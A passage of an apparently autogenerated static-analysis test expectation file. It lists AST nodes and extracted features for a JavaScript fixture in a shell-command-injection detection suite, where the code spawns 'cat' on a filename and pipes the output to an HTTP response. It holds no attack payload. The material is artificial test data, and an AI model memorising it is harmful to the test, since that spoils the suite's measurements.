+| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:19 | res.write(data) | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:19 | res.write(data) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:19 | res.write(data) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:9:116:13 | write | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:9:116:13 | write | contextSurroundingFunctionParameters | ()\n(data) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:9:116:13 | write | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:9:116:13 | write | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:9:116:13 | write | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:15:116:18 | data | CalleeFlexibleAccessPath | res.write | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:15:116:18 | data | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:15:116:18 | data | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:15:116:18 | data | contextSurroundingFunctionParameters | ()\n(data) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:15:116:18 | data | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:15:116:18 | data | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:15:116:18 | data | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:15:116:18 | data | receiverName | res | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:5 | cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:5 | cat | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:5 | cat | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:5 | cat | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:5 | cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:12 | cat.stdout | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:12 | cat.stdout | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:12 | cat.stdout | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:12 | cat.stdout | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:12 | cat.stdout | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:15 | cat.stdout.on | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:15 | cat.stdout.on | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:15 | cat.stdout.on | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:15 | cat.stdout.on | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:15 | cat.stdout.on | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:39 | cat.std ... .end()) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:39 | cat.std ... .end()) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:39 | cat.std ... .end()) | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:39 | cat.std ... .end()) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:39 | cat.std ... .end()) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:39 | exceptional return of cat.std ... .end()) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:39 | exceptional return of cat.std ... .end()) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:39 | exceptional return of cat.std ... .end()) | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:39 | exceptional return of cat.std ... .end()) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:39 | exceptional return of cat.std ... .end()) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:7:118:12 | stdout | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:7:118:12 | stdout | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:7:118:12 | stdout | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:7:118:12 | stdout | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:7:118:12 | stdout | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:14:118:15 | on | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:14:118:15 | on | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:14:118:15 | on | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:14:118:15 | on | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:14:118:15 | on | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:17:118:21 | 'end' | CalleeFlexibleAccessPath | cat.stdout.on | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:17:118:21 | 'end' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:17:118:21 | 'end' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:17:118:21 | 'end' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:17:118:21 | 'end' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:17:118:21 | 'end' | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:17:118:21 | 'end' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:17:118:21 | 'end' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | 'arguments' object of anonymous function | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | () => res.end() | CalleeFlexibleAccessPath | cat.stdout.on | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | () => res.end() | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | () => res.end() | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | () => res.end() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | () => res.end() | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | () => res.end() | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | () => res.end() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | () => res.end() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | exceptional return of anonymous function | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | return of anonymous function | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:24:118:38 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:32 | res | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:32 | res | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:32 | res | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:32 | res | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:32 | res | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:36 | res.end | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:36 | res.end | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:36 | res.end | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:36 | res.end | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:36 | res.end | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:38 | exceptional return of res.end() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:38 | exceptional return of res.end() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:38 | exceptional return of res.end() | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:38 | exceptional return of res.end() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:38 | exceptional return of res.end() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:38 | res.end() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:38 | res.end() | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:38 | res.end() | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:38 | res.end() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:38 | res.end() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:34:118:36 | end | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:34:118:36 | end | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:34:118:36 | end | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:34:118:36 | end | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:34:118:36 | end | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:5:121:8 | dead | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:5:121:8 | dead | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:5:121:8 | dead | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:5:121:64 | dead = ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:5:121:64 | dead = ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:5:121:64 | dead = ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:12:121:15 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:12:121:15 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:12:121:15 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:12:121:64 | exceptional return of exec("c ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:12:121:64 | exceptional return of exec("c ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:12:121:64 | exceptional return of exec("c ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:12:121:64 | exec("c ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:12:121:64 | exec("c ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:12:121:64 | exec("c ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:17:121:29 | "cat foo/bar" | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:17:121:29 | "cat foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:17:121:29 | "cat foo/bar" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:17:121:29 | "cat foo/bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:17:121:29 | "cat foo/bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:17:121:29 | "cat foo/bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | 'arguments' object of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | 'arguments' object of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | (err, o ... g(out)} | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | (err, o ... g(out)} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | (err, o ... g(out)} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | (err, o ... g(out)} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | (err, o ... g(out)} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | (err, o ... g(out)} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | exceptional return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | exceptional return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:32:121:63 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:33:121:35 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:33:121:35 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:33:121:35 | err | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:33:121:35 | err | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:33:121:35 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:38:121:40 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:38:121:40 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:38:121:40 | out | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:38:121:40 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:38:121:40 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:38:121:40 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:38:121:40 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:38:121:40 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:38:121:40 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:38:121:40 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:53 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:53 | console | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:53 | console | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:53 | console | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:53 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:57 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:57 | console.log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:57 | console.log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:57 | console.log | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:57 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:62 | console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:62 | console.log(out) | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:62 | console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:62 | console.log(out) | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:62 | console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:62 | exceptional return of console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:62 | exceptional return of console.log(out) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:62 | exceptional return of console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:62 | exceptional return of console.log(out) | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:62 | exceptional return of console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:55:121:57 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:55:121:57 | log | 